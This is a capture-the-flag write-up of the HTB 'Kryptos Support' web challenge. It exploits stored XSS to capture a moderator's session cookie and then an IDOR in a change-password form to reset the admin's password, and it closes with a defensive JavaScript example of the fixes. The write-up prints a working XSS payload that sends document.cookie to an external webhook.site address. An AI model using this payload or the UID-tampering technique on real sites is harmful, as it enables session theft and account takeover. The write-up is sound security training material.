CTF 2022 / 🖥 HTB Cyber Apocalypse 2022 Intergalactic Chase
1️⃣ Web 300: Kryptos Support


Last updated 2 years ago

During enumeration I found a form that accepts submissions (a support ticket) and a separate page that serves as a login portal.

I submitted some test content and got this:

The response above hinted at a possible XSS attack, which could let me capture the admin's cookies/session. I sent a crafted XSS payload that calls back to https://webhook.site:

<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>

Now I had the session cookie.

I installed a cookie editor extension to reuse the session cookie captured by the XSS attack.

I was then redirected to the admin panel. I didn't find any input field or file upload there, just the ticket I had submitted.

While checking the links, I found a change-password form. I tried to change the password of the current account, and that's when I noticed that the account I had compromised was a moderator.

So I suspected there was an admin account for this application. Next, I used the browser's inspect element function to look for hidden fields, and that is where I found the UID.

I edited the value to 1, supplied a password of my choice and clicked submit; I then received the message below.

I logged in as admin with my chosen password and was automatically redirected to the home page, which displayed the flag.

Conclusion: the application is vulnerable to persistent (stored) XSS and to IDOR (Insecure Direct Object Reference): the change-password form trusts a client-supplied UID instead of the authenticated session, so any logged-in user can reset the admin's password.
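The two weaknesses above, modelled from the defender's side as an added example (this is not code from the write-up or from the challenge itself): ticket content is HTML-encoded before staff see it, the session cookie is marked HttpOnly so an injected script cannot read it, and the change-password handler takes the target account from the authenticated session rather than from a hidden form field. All names (makeUsers, renderTicket, sessionCookie, changePasswordVulnerable, changePasswordFixed) and the sample user table are assumptions for illustration.

```javascript
// Added example modelling the write-up's stored XSS and IDOR flaws and their fixes.
// Names and sample data are assumptions, not the challenge's real code.

// Constructed sample user table; a fresh copy per call keeps runs independent.
function makeUsers() {
  return new Map([
    [1, { uid: 1, name: "admin", role: "admin", password: "admin-initial" }],
    [2, { uid: 2, name: "moderator", role: "moderator", password: "mod-initial" }],
  ]);
}

// Stored XSS fix: HTML-encode ticket text before it is rendered to staff,
// so a submitted <script> tag is shown literally instead of executed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderTicket(content) {
  return `<div class="ticket">${escapeHtml(content)}</div>`;
}

// Session cookie attributes: HttpOnly keeps the value out of document.cookie,
// so even a script that does run in the admin's browser cannot exfiltrate it.
function sessionCookie(sid) {
  return `session=${sid}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Vulnerable handler (the IDOR in the write-up): the account to modify comes
// from a hidden form field that the client controls.
function changePasswordVulnerable(users, session, form) {
  const target = users.get(Number(form.uid));
  if (!target) return { ok: false, reason: "no such user" };
  target.password = form.password;
  return { ok: true, uid: target.uid };
}

// Fixed handler: the target is always the authenticated user. A form uid that
// disagrees with the session is rejected and flagged so it can be logged as a
// tampering attempt rather than silently ignored.
function changePasswordFixed(users, session, form) {
  const target = users.get(session.uid);
  if (!target) return { ok: false, reason: "not authenticated" };
  if (form.uid !== undefined && Number(form.uid) !== session.uid) {
    return { ok: false, reason: "uid mismatch", suspicious: true };
  }
  if (typeof form.password !== "string" || form.password.length < 12) {
    return { ok: false, reason: "password too short" };
  }
  target.password = form.password;
  return { ok: true, uid: target.uid };
}

// Stand-alone demonstration: a moderator session trying to reset uid 1.
const moderatorSession = { uid: 2 };
const tamperedForm = { uid: "1", password: "correcthorsebattery" };
console.log(changePasswordVulnerable(makeUsers(), moderatorSession, tamperedForm));
console.log(changePasswordFixed(makeUsers(), moderatorSession, tamperedForm));
console.log(renderTicket('<script>document.write("x")</script>'));
```

The `suspicious` flag is the detection hook: a request whose form UID differs from the session UID is exactly the tampering the write-up performed, and logging it with the session's user id gives the SOC a concrete signal rather than a silent no-op.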